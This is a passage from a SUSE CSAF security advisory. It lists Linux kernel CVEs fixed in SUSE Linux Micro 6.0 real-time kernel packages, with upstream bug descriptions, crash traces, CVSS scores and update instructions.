sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: atlantic: fix fragment overflow handling in RX path\n\nThe atlantic driver can receive packets with more than MAX_SKB_FRAGS (17)\nfragments when handling large multi-descriptor packets. This causes an\nout-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic.\n\nThe issue occurs because the driver doesn\u0027t check the total number of\nfragments before calling skb_add_rx_frag(). When a packet requires more\nthan MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds.\n\nFix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\nthen all fragments are accounted for. And reusing the existing check to\nprevent the overflow earlier in the code path.\n\nThis crash occurred in production with an Aquantia AQC113 10G NIC.\n\nStack trace from production environment:\n```\nRIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0\nCode: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89\nca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90\nc8 00 00 00 \u003c48\u003e 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48\n89 fa 83\nRSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287\nRAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX:\nfffffffe0a0c8000\nRDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI:\n0000000000037a40\nRBP: 0000000000000024 R08: 0000000000000000 R09:\n0000000000000021\nR10: 0000000000000848 R11: 0000000000000000 R12:\nffffa9bec02a8e24\nR13: ffff925ad8615570 R14: 0000000000000000 R15:\nffff925b22e80a00\nFS: 0000000000000000(0000)\nGS:ffff925e47880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4:\n0000000000f72ef0\nPKRU: 55555554\nCall Trace:\n\u003cIRQ\u003e\naq_ring_rx_clean+0x175/0xe60 [atlantic]\n? aq_ring_rx_clean+0x14d/0xe60 [atlantic]\n? aq_ring_tx_clean+0xdf/0x190 [atlantic]\n? kmem_cache_free+0x348/0x450\n? aq_vec_poll+0x81/0x1d0 [atlantic]\n? __napi_poll+0x28/0x1c0\n? net_rx_action+0x337/0x420\n```\n\nChanges in v4:\n- Add Fixes: tag to satisfy patch validation requirements.\n\nChanges in v3:\n- Fix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\n then all fragments are accounted for.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68301",
"url": "https://www.suse.com/security/cve/CVE-2025-68301"
},
{
"category": "external",
"summary": "SUSE Bug 1255120 for CVE-2025-68301",
"url": "https://bugzilla.suse.com/1255120"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68301"
},
{
"cve": "CVE-2025-68303",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68303"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: intel: punit_ipc: fix memory corruption\n\nThis passes the address of the pointer \"\u0026punit_ipcdev\" when the intent\nwas to pass the pointer itself \"punit_ipcdev\" (without the ampersand).\nThis means that the:\n\n\tcomplete(\u0026ipcdev-\u003ecmd_complete);\n\nin intel_punit_ioc() will write to a wrong memory address corrupting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68303",
"url": "https://www.suse.com/security/cve/CVE-2025-68303"
},
{
"category": "external",
"summary": "SUSE Bug 1255122 for CVE-2025-68303",
"url": "https://bugzilla.suse.com/1255122"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68303"
},
{
"cve": "CVE-2025-68305",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68305"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sock: Prevent race in socket write iter and sock bind\n\nThere is a potential race condition between sock bind and socket write\niter. bind may free the same cmd via mgmt_pending before write iter sends\nthe cmd, just as syzbot reported in UAF[1].\n\nHere we use hci_dev_lock to synchronize the two, thereby avoiding the\nUAF mentioned in [1].\n\n[1]\nsyzbot reported:\nBUG: KASAN: slab-use-after-free in mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316\nRead of size 8 at addr ffff888077164818 by task syz.0.17/5989\nCall Trace:\n mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316\n set_link_security+0x5c2/0x710 net/bluetooth/mgmt.c:1918\n hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719\n hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:742\n sock_write_iter+0x279/0x360 net/socket.c:1195\n\nAllocated by task 5989:\n mgmt_pending_add+0x35/0x140 net/bluetooth/mgmt_util.c:296\n set_link_security+0x557/0x710 net/bluetooth/mgmt.c:1910\n hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719\n hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:742\n sock_write_iter+0x279/0x360 net/socket.c:1195\n\nFreed by task 5991:\n mgmt_pending_free net/bluetooth/mgmt_util.c:311 [inline]\n mgmt_pending_foreach+0x30d/0x380 net/bluetooth/mgmt_util.c:257\n mgmt_index_removed+0x112/0x2f0 net/bluetooth/mgmt.c:9477\n hci_sock_bind+0xbe9/0x1000 net/bluetooth/hci_sock.c:1314",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68305",
"url": "https://www.suse.com/security/cve/CVE-2025-68305"
},
{
"category": "external",
"summary": "SUSE Bug 1255169 for CVE-2025-68305",
"url": "https://bugzilla.suse.com/1255169"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68305"
},
{
"cve": "CVE-2025-68307",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68307"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: gs_usb: gs_usb_xmit_callback(): fix handling of failed transmitted URBs\n\nThe driver lacks the cleanup of failed transfers of URBs. This reduces the\nnumber of available URBs per error by 1. This leads to reduced performance\nand ultimately to a complete stop of the transmission.\n\nIf the sending of a bulk URB fails do proper cleanup:\n- increase netdev stats\n- mark the echo_sbk as free\n- free the driver\u0027s context and do accounting\n- wake the send queue",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68307",
"url": "https://www.suse.com/security/cve/CVE-2025-68307"
},
{
"category": "external",
"summary": "SUSE Bug 1255146 for CVE-2025-68307",
"url": "https://bugzilla.suse.com/1255146"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68307"
},
{
"cve": "CVE-2025-68308",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68308"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: kvaser_usb: leaf: Fix potential infinite loop in command parsers\n\nThe `kvaser_usb_leaf_wait_cmd()` and `kvaser_usb_leaf_read_bulk_callback`\nfunctions contain logic to zero-length commands. These commands are used\nto align data to the USB endpoint\u0027s wMaxPacketSize boundary.\n\nThe driver attempts to skip these placeholders by aligning the buffer\nposition `pos` to the next packet boundary using `round_up()` function.\n\nHowever, if zero-length command is found exactly on a packet boundary\n(i.e., `pos` is a multiple of wMaxPacketSize, including 0), `round_up`\nfunction will return the unchanged value of `pos`. This prevents `pos`\nto be increased, causing an infinite loop in the parsing logic.\n\nThis patch fixes this in the function by using `pos + 1` instead.\nThis ensures that even if `pos` is on a boundary, the calculation is\nbased on `pos + 1`, forcing `round_up()` to always return the next\naligned boundary.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68308",
"url": "https://www.suse.com/security/cve/CVE-2025-68308"
},
{
"category": "external",
"summary": "SUSE Bug 1255149 for CVE-2025-68308",
"url": "https://bugzilla.suse.com/1255149"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68308"
},
{
"cve": "CVE-2025-68312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusbnet: Prevents free active kevent\n\nThe root cause of this issue are:\n1. When probing the usbnet device, executing usbnet_link_change(dev, 0, 0);\nput the kevent work in global workqueue. However, the kevent has not yet\nbeen scheduled when the usbnet device is unregistered. Therefore, executing\nfree_netdev() results in the \"free active object (kevent)\" error reported\nhere.\n\n2. Another factor is that when calling usbnet_disconnect()-\u003eunregister_netdev(),\nif the usbnet device is up, ndo_stop() is executed to cancel the kevent.\nHowever, because the device is not up, ndo_stop() is not executed.\n\nThe solution to this problem is to cancel the kevent before executing\nfree_netdev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68312",
"url": "https://www.suse.com/security/cve/CVE-2025-68312"
},
{
"category": "external",
"summary": "SUSE Bug 1255171 for CVE-2025-68312",
"url": "https://bugzilla.suse.com/1255171"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68312"
},
{
"cve": "CVE-2025-68313",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68313"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Add RDSEED fix for Zen5\n\nThere\u0027s an issue with RDSEED\u0027s 16-bit and 32-bit register output\nvariants on Zen5 which return a random value of 0 \"at a rate inconsistent\nwith randomness while incorrectly signaling success (CF=1)\". Search the\nweb for AMD-SB-7055 for more detail.\n\nAdd a fix glue which checks microcode revisions.\n\n [ bp: Add microcode revisions checking, rewrite. ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68313",
"url": "https://www.suse.com/security/cve/CVE-2025-68313"
},
{
"category": "external",
"summary": "SUSE Bug 1255415 for CVE-2025-68313",
"url": "https://bugzilla.suse.com/1255415"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68313"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
